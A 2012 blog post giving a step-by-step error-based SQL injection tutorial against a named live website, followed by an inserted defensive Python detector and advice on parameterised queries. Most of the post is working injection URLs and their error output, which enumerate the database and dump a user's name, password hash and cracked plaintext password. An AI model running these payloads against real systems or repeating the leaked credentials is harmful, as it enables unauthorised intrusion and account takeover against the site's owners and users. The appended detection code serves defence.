Sunday, 22 April 2012

SQL Injection Double Query Tutorial [LIVE TARGET]

Bismillah...
Let's get straight to it...

target =

Try adding a single quote..
and an error comes back....
======
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
======
That is the error message...

Check the MySQL version
============
http://www.techvision.co.uk/news.php?id=45+and+(select+1+from(select%0Acount(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

>>>>Duplicate entry '5.0.95-log1' for key 1

===========================

Check the DB name...
=============
http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>>>Duplicate entry 'techvision281009~1' for key 1

=====================================

Find the user table in the db -techvision281009-
===========
http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 31,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>NO ERROR

Here we have to find where the user table is...
Look at this part of the query:

>>>>tables where table_schema=database() limit 31,1)

which turns out to return a blank result [the tables number fewer than 30],
so we change that limit until we find the user table..

Here:
=========
http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>>Duplicate entry 'users~1' for key 1

===============================
Here I changed the limit from -->>
=database() limit 31,1) TO =database() limit 2,1)

That is where the user table is.

OK, now we look for the user and password columns in that table..
Convert the table name to hex:

users : 7573657273
Prepend 0x so it becomes >>>columns where table_name=0x7573657273

================
http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>>Duplicate entry 'username~1' for key 1

That is the username column...
We find the password column by raising the limit:

columns where table_name=0x7573657273 limit 1,1) >>>> columns where table_name=0x7573657273 limit 2,1)

==================
http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

>>>>>Duplicate entry 'password~1' for key 1

===========================================
Conclusion:
[+]columns where table_name=0x7573657273 limit 1,1) >>>> the username column
[+]columns where table_name=0x7573657273 limit 2,1) >>>> the password column


Now we dump everything ......
=========================
http://www.techvision.co.uk/news.php?id=45 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x7e,password) as char),0x7e)) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


>>>>>Duplicate entry 'debandy~9679ee7b0e7ddb35b34046a7c76e6e23~1' for key 1

=========================
NOTE THIS PART:
(concat(username,0x7e,password)

This must match the column names....
>>>>Duplicate entry 'username~1' for key 1 --->> that is the user column, "username"
>>>>>Duplicate entry 'password~1' for key 1 --->> that is the password column, "password"

Now all that is left is to decrypt it...
9679ee7b0e7ddb35b34046a7c76e6e23 = l674300b

and find the login page ....


Special thanks: cyberc0de and cep khan....
Alhamdulillah..
Hope this is useful
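
For defenders, every request in this walkthrough has the same shape: `count(*)`, `floor(rand(0)*2)` and `group by` in one query string, answered by a `Duplicate entry ... for key` error. The following is an added example, not part of the original post: a Python check over request/response pairs, where the function names, labels and sample records are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Structural markers present in every request shown in the post.
MARKERS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "info_schema": re.compile(r"\binformation_schema\s*\.", re.I),
}
CORE = {"rand_floor", "count_star", "group_by"}
# MySQL error text that the application echoed back to the client.
DUP_ENTRY = re.compile(r"Duplicate entry '[^']*' for key", re.I)


def markers_in(query_string):
    """Decode '+' and %xx, collapse whitespace, return the marker names found."""
    q = re.sub(r"\s+", " ", unquote_plus(query_string))
    return {name for name, rx in MARKERS.items() if rx.search(q)}


def classify(query_string, response_body=""):
    """Return 'confirmed', 'attempt', 'error-leak' or 'clean' for one request."""
    core = CORE <= markers_in(query_string)
    leaked = bool(DUP_ENTRY.search(response_body))
    if core and leaked:
        return "confirmed"   # payload shape seen and the DB error reached the client
    if core:
        return "attempt"     # payload shape seen, error not echoed
    if leaked:
        return "error-leak"  # verbose DB errors exposed, worth fixing on its own
    return "clean"


# Constructed sample records: (query string, response body excerpt).
SAMPLES = [
    ("id=45", "<h1>News</h1>"),
    ("id=45+and+(select+1+from(select%0Acount(*),concat(version(),floor(Rand(0)*2))a"
     "+from+information_schema.tables+group+by+a)b)",
     "Duplicate entry '5.0.95-log1' for key 1"),
    ("id=45%20and%20(select%201%20from%20(select%20count(*),concat(database(),"
     "floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)",
     "<h1>Something went wrong</h1>"),
    ("id=45&order=group+by+date", "<h1>News</h1>"),
]

if __name__ == "__main__":
    for qs, body in SAMPLES:
        print(f"{classify(qs, body):10} {qs[:60]}")
```

Detection is a backstop: the fix for the application is to bind `id` as a parameter in a prepared statement and to stop echoing database errors to the client.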

SQL Injection Double Query Tutorial [LIVE TARGET] Rating: 4.5 Posted by: r007-

2 comments:

  1. please ..write in english.. nettichrysolite@,gmail,com

  2. Open My Video

    http://www.youtube.com/watch?v=890ktDjUorM
